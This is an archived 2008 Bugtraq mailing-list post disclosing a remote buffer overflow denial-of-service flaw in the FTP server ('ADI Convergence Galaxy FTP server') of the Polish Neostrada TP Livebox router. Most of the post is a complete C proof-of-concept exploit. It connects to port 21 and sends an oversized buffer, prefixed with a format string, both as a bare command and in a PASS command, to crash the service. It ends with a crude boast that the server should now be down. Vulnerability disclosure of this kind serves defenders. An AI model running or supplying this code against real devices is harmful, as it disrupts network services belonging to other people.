[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20080301213107.4491.qmail@securityfocus.com>
Date: 1 Mar 2008 21:31:07 -0000
From: 0in.email@...il.com
To: bugtraq@...urityfocus.com
Subject: Livebox Router vulnerability to REMOTE BUFFER OVERFLOW DoS (FTPD)_
Livebox Router vulnerability to REMOTE BUFFER OVERFLOW DoS
Discovered by: 0in from DaRk-CodeRs Security & Programming Group!
http://dark-coders.4rh.eu
DESCRIPTION:
Livebox (tested on polish "Neostrada TP Livebox") is vulnerability to remote (but from local network, because firewall working..) buffer overflow DoS attack to FTP service.
FULL FTP SERVER NAME:"ADI Convergence Galaxy FTP server v0.1".
POC:
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
int port=21;
struct hostent *he;
struct sockaddr_in their_addr;
int konekt(char *addr)
{
int sock;
he=gethostbyname(addr);
if(he==NULL)
{
printf("Unknow host!\nexiting...");
return -1;
}
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket");
return -2;
}
their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(port);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(their_addr.sin_zero), '\0', 8);
if (connect(sock, (struct sockaddr *)&their_addr,
sizeof(struct sockaddr)) == -1)
{
perror("connect");
return -1;
}
return sock;
}
int main(int argc,char *argv[])
{
printf("\n+===============================Yeah======================================+");
printf("\n+= ADI Convergence Galaxy FTP Server v1.0 (Neostrada Livebox DSL Router) =+");
printf("\n+= Remote Buffer Overflow DoS Exploit =+");
printf("\n+= bY =+");
printf("\n+= Maks M. [0in] From Dark-CodeRs Security & Programming Group! =+");
printf("\n+= 0in(dot)email[at]gmail(dot)com =+");
printf("\n+= Please visit: http://dark-coders.4rh.eu =+");
printf("\n+= Greetings to: Die_Angel, Sun8hclf, M4r1usz, Aristo89, Djlinux =+");
printf("\n+= MaLy, Slim, elwin013, Rade0n3900, Wojto111, =+");
printf("\n+= Chomzee, AfroPL, Joker186 =+");
printf("\n+===============================Yeah======================================+");
if(argc<2)
{
printf("\nUse %s [IP]!\n",argv[0]);
exit(0);
}
printf("\nConnecting to:%s...",argv[1]);
int sock=konekt(argv[1]);
if(sock<0)
{
printf("\neh...");
exit(0);
}
printf("\nConnected!!\n");
char rcv[256];
recv(sock,rcv,255,0);
printf("\n%s\n",rcv);
printf("\nSending evil buffer..");
char evil[100*100]="%n\x01\x02\x03\x04";
int i;
for(i=0;i<(100*100)-100;i++)
{
strcat(evil,"A");
}
strcat(evil,"\r\n");
send(sock,evil,strlen(evil),0);
strcpy(rcv,"");
recv(sock,rcv,255,0);
printf("\n%s\n",rcv);
char pass[100*1000]="PASS ";
strcat(pass,evil);
strcat(pass,"\n\r");
send(sock,pass,strlen(pass),0);
strcpy(rcv,"");
recv(sock,rcv,255,0);
printf("\n%s\n",rcv);
printf("\nOK!\nYou're Livebox FTP server should fu**ed out...");
exit(0);
}
EOF.
Powered by blists - more mailing lists